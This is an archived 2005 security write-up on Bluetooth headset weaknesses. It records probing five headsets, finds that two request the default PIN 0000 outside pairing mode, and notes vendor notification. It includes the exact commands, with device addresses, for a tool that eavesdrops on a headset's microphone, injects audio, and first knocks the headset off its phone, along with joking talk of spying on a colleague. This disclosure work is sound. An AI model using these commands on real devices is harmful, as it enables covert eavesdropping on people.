what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HijackHeadSet.txt

HijackHeadSet.txt
Posted Sep 24, 2005
Authored by Kevin Finisterre | Site digitalmunition.com

Small write up entitled "Hijacking Bluetooth Headsets for Fun and Profit".

tags | paper
SHA-256 | 77323c05bbb2580095063a300d007938e1bc5d61ac068734b800ab7a87e42caf

HijackHeadSet.txt

Change Mirror Download
        Hijacking Bluetooth Headsets for Fun and Profit? 
kf[at]digitalmunition[dot]com
http://www.digitalmunition.com/HijackHeadSet.txt

A few years ago when I worked for SNOSoft my business partner 'Simon' was one of those guys who rocked out
a Bluetooth Headset just about every time I talked to him on his cell phone. I loathed both him and those
other guys that you saw walking around mall with that Cardassian ear growth shit hanging off the side of
their head. I cursed both his headset and those of the other bastards I saw at the mall and on the roads!
I swore that one day his headset and all of theirs would feel my wrath!

In efforts to satisfy my thirst for Bluetooth I wound up purchasing several random headsets.
http://www.digitalmunition.com/HeadSets.jpg

00:03:89:AA:5A:AC M2500 by Plantronics
00:07:A4:95:28:E2 Jabra BT110
00:15:0E:91:19:73 Anycom Stereo Headset
00:07:A4:21:ED:27 Jabra BT800
00:07:A4:79:05:3B Motorola HS820

By default none of these devices are discoverable. In order to 'see' each headset it must be placed into
'pairing mode'.

Even though the device is not discoverable you may manage to discover a headset via Ollie Whitehouse /
RedFang style techniques or through a barrage of L2CAP echo requests. If you do, in some cases you may be
able to eavesdrop on or spew propaganda at the owner of the headset.

Various headsets may or may not respond to L2CAP or RFCOMM requests depending on their current connection
state. Some headsets for example continue to service requests even though they are currently 'connected'
with a cell phone. This can obviously make them easy to find. Usually an l2ping to a device that is in
the 'connected' state results in 'Can't connect: Host is down'.

Of the 5 headsets that I own my Anycom headset is the only one that responds when 'connected'.
animosity:/home/kfinisterre# l2ping 00:15:0E:91:19:73
Ping: 00:15:0E:91:19:73 from 00:11:B1:07:BE:A7 (data size 44) ...
4 bytes from 00:15:0E:91:19:73 id 0 time 42.71ms
4 bytes from 00:15:0E:91:19:73 id 1 time 35.34ms
2 sent, 2 received, 0% loss

When the devices are NOT connected with a cell phone the results change a bit. Some devices completely
refuse to respond, some respond with PIN Code Requests and others with Link Key Requests.

The Plantronics headset wanted me to send it a PIN Code...

< HCI Command: Create Connection (0x01|0x0005) plen 13
> HCI Event: Command Status (0x0f) plen 4
> HCI Event: PIN Code Request (0x16) plen 6
< HCI Command: PIN Code Request Negative Reply (0x01|0x000e) plen 6

The Jabra BT110 simply will not respond at all.
animosity:/home/kfinisterre# l2ping 00:07:A4:95:28:E2
Can't connect: Host is down

The Anycom responds exactly as it did before.
animosity:/home/kfinisterre# l2ping 00:15:0E:91:19:73
Ping: 00:15:0E:91:19:73 from 00:11:B1:07:BE:A7 (data size 44) ...
4 bytes from 00:15:0E:91:19:73 id 0 time 41.72ms
4 bytes from 00:15:0E:91:19:73 id 1 time 34.55ms
4 bytes from 00:15:0E:91:19:73 id 2 time 39.32ms
4 bytes from 00:15:0E:91:19:73 id 3 time 43.88ms
4 sent, 4 received, 0% loss

The Jabra BT800 simply refused the connection. Although the connection was refused. We were still able to
determine that the device existed based on the Invalid exchange response.
animosity:/home/kfinisterre# l2ping 00:07:A4:21:ED:27
Can't connect: Invalid exchange

< HCI Command: Create Connection (0x01|0x0005) plen 13
> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Connect Complete (0x03) plen 11

The Motorola also refused but only AFTER a link key request was made. Again... we know it exists based on
the Invalid exchange response. Knowing that the device exists could aid in a future attack.

animosity:/home/kfinisterre# l2ping 00:07:A4:79:05:3B
Can't connect: Invalid exchange

< HCI Command: Create Connection (0x01|0x0005) plen 13
> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Link Key Request (0x17) plen 6
< HCI Command: Link Key Request Negative Reply (0x01|0x000c) plen 6
> HCI Event: Command Complete (0x0e) plen 10
> HCI Event: Connect Complete (0x03) plen 11

Since we got quite a variety of responses to the l2ping test it made sense to see how rfcomm connections
worked out.

Upon connecting to the Plantronics it sends a PIN code request again.

< HCI Command: Create Connection (0x01|0x0005) plen 13
> HCI Event: Command Status (0x0f) plen 4
> HCI Event: PIN Code Request (0x16) plen 6
< HCI Command: PIN Code Request Negative Reply (0x01|0x000e) plen 6
> HCI Event: Command Complete (0x0e) plen 10
> HCI Event: Connect Complete (0x03) plen 11

The Jabra BT110 as usual simply does not respond.
animosity:/home/kfinisterre# rfcomm connect 1 00:07:A4:95:28:E2 1
Can't connect RFCOMM socket: Host is down

This time the Anycom asks for a PIN code just like the Plantronics did.

< HCI Command: Create Connection (0x01|0x0005) plen 13
> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Connect Complete (0x03) plen 11
< ACL data: handle 42 flags 0x02 dlen 12
L2CAP(s): Connect req: psm 3 scid 0x0040
< HCI Command: Write Link Policy Settings (0x02|0x000d) plen 4
> HCI Event: Command Complete (0x0e) plen 6
> HCI Event: Number of Completed Packets (0x13) plen 5
> HCI Event: Page Scan Repetition Mode Change (0x20) plen 7
> ACL data: handle 42 flags 0x02 dlen 16
L2CAP(s): Connect rsp: dcid 0x0040 scid 0x0040 result 1 status 2
Connection pending - Authorization pending
> HCI Event: Max Slots Change (0x1b) plen 3
> HCI Event: PIN Code Request (0x16) plen 6
< HCI Command: PIN Code Request Negative Reply (0x01|0x000e) plen 6
> HCI Event: Command Complete (0x0e) plen 10
> ACL data: handle 42 flags 0x02 dlen 16
L2CAP(s): Connect rsp: dcid 0x0000 scid 0x0040 result 3 status 0
Connection refused - security block
> HCI Event: Disconn Complete (0x05) plen 4


The Jabra BT800 refuses the connection.

Can't connect RFCOMM socket: Invalid exchange

< HCI Command: Create Connection (0x01|0x0005) plen 13
> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Connect Complete (0x03) plen 11

The motorola also refuses again after a link key request.

Can't connect RFCOMM socket: Invalid exchange
< HCI Command: Create Connection (0x01|0x0005) plen 13
> HCI Event: Command Status (0x0f) plen 4
> HCI Event: Link Key Request (0x17) plen 6
< HCI Command: Link Key Request Negative Reply (0x01|0x000c) plen 6
> HCI Event: Command Complete (0x0e) plen 10
> HCI Event: Connect Complete (0x03) plen 11

Obviously one interesting discovery was that 2 of the above headsets attempted to obtain a PIN code from us even
though they were not in pairing mode. Every single headset I own has a default PIN code of 0000. Because these
devices are prompting to input a well known default PIN number and they are not in pairing mode the owners of
these devices are put are risk of being eavesdropped upon.

Both devices that asked us for a PIN code are vulnerable to a remote monitoring attack using the Trifinite Car
Whisperer http://trifinite.org/trifinite_downloads.html. Quite a few devices support multiple pairings so the
owner of the phone may not have any indication that an attack is occuring.

Using Car Whisperer allows us to both monitor the microphone of the headsets in question and to inject audio into
the ear piece.

animosity:/home/kfinisterre/carwhisperer-0.1# ./carwhisperer 0 eargasm.raw /tmp/out.raw 00:03:89:AA:5A:AC
Voice setting: 0x0060
RFCOMM channel connected
SCO audio channel connected (handle 45, mtu 64)
(inject propaganda and then read from the mic)

In the case of the Anycom BSH-100 we are even able to terminate an existing connection with a cell phone before
we attack! Simply run Car Whisperer twice! The first connection will kill the link to the cell phone.
kfinisterre@animosity:~/carwhisperer-0.1$ ./carwhisperer 0 eargasm.raw /tmp/out.raw 00:15:0E:91:19:73
Voice setting: 0x0060
RFCOMM channel connected
SCO audio channel connected (handle 45, mtu 64)
(let em know I'm Rick James and then read from the mic)

The issues I have outlined in this document occur because of poor implementation of the Bluetooth Head Set Profile.
Unless a headset has specifically been placed into 'pairing mode' it should NOT request a PIN Code upon connection
from a previously un-paired foreign device!

Both Plantronics and Anycom were notified about the above issues however neither company really made an effort to
communicate any plans to address the problems. Due to the fact that other vendors may be affected I have decided
to release this information.

So Simon I have to ask you do you still have that headset? If so keep the batteries fresh for me... I'm creeping on it!
http://www.digitalmunition.com/creepin.jpg

-KF


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close